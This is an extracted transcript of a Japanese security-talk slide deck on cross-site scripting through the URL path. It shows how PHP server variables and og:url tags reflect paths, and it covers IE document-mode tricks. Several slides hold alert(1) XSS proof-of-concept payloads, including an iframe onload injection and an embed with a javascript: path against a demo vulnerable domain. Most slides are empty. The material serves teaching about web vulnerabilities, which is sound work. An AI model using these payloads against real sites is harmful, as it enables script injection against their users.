明日から使える?! PATHでXSSする技術/ Shibuya.XSS techtalk #7

Transcript

1. None
2. None
3. None
4. None
5. None

6. https://host/tags/aaa/ ... </head> <body> <form> <input type="text" value="aaa"> ...

7. ... </head> <meta property="og:url" content="https://host/path/index"> <body> ... https://host/path/index?p=1

8. ... </head> <meta property="og:url" content="https://host/path/index;aaa"> <body> ... https://host/path/index;aaa?p=1

9. None

10. http://php.net/index.php http://php.net/index.php/xxx/yyy/zzz

11. http://shibuyaxss.connpass.com/event/28232/ http://shibuyaxss.connpass.com/event/28232/;abc

12. None

13. SCRIPT_URL /test.php/<b>PATH</b> SCRIPT_URI http://localhost/test.php/<b>PATH</b> PATH_INFO /<b>PATH</b> PATH_TRANSLATED \<b>PATH<\b> PHP_SELF /test.php/<b>PATH</b>

14. GET /path?query HTTP/1.1 http://php.net/manual/ja/reserved.variables.server.php

15. /test.php/<b>PATH</b>?<b>QUERY</b> GET /test.php/%3Cb%3EPATH%3C/b%3E?%3Cb%3EQUERY% 3C/b%3E HTTP/1.1 QUERY_STRING %3Cb%3EQUERY%3C/b%3E REQUEST_URI /test.php/%3Cb%3EPATH%3C/b%3E? %3Cb%3EQUERY%3C/b%3E

    http://localhost/test.php/<b>PATH</b>?<b>QUERY</b>

16. /test.php/%3Cb%3EPATH%3C/b%3E?<b>QUERY</b> GET /test.php/%3Cb%3EPATH%3C/b%3E?<b>QUERY</b> HTTP/1.1 QUERY_STRING <b>QUERY</b> REQUEST_URI /test.php/%3Cb%3EPATH%3C/b%3E?<b>QUERY</b> http://localhost/test.php/<b>PATH</b>?<b>QUERY</b>

17. http://localhost/test.php/<b>PATH</b> GET /test.php/<b>PATH</b> HTTP/1.1

18. /test.php/%3Cb%3EPATH%3C/b%3E GET /test.php/<b>PATH</b> HTTP/1.1 REQUEST_URI /test.php/<b>PATH</b> location.pathname /test.php/%3Cb%3EPATH%3C/b%3E http://localhost/test.php/<b>PATH</b>

19. None
20. None
21. None
22. None
23. None
24. None
25. None
26. None
27. None
28. None
29. None
30. None
31. None
32. None
33. None

34. HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 X-UA-Compatible: IE=9 <head> <meta

    http-equiv="X-UA-Compatible" content="IE=9"> </head>

35. <svg> <circle cx="100" cy="100" r="50" fill="red"/> </svg>

36. ifr=document.createElement('<iframe onload=alert(1)>'); document.body.appendChild(ifr); InvalidCharacterError

37. <meta http-equiv="X-UA-Compatible" content="IE=9"> <script> console.log(document.documentMode) /* 9 */ </script> <iframe

    src=//victim/></iframe> http://blogs.msdn.com/cfs-filesystemfile.ashx/__key/communityserver-blogs-components- weblogfiles/00-00-01-35-07/3073.IE_5F00_chart_5F00_jp.pdf

38. <meta http-equiv="X-UA-Compatible" content="IE=9"> <embed src="http://shibuya.vulnerabledoma.in/javascript:alert(1)/% 2F..%2F..%2Fjizen2#hash"></embed>

39. <script src="//ajax.googleapis.com/ajax/libs/jquerymobile/1.4.5/jquery.mobile.min.js"> </script>

40. None
41. None
42. None
43. None
44. None
45. None
46. None
47. None
48. None
49. None
50. None
51. None
52. None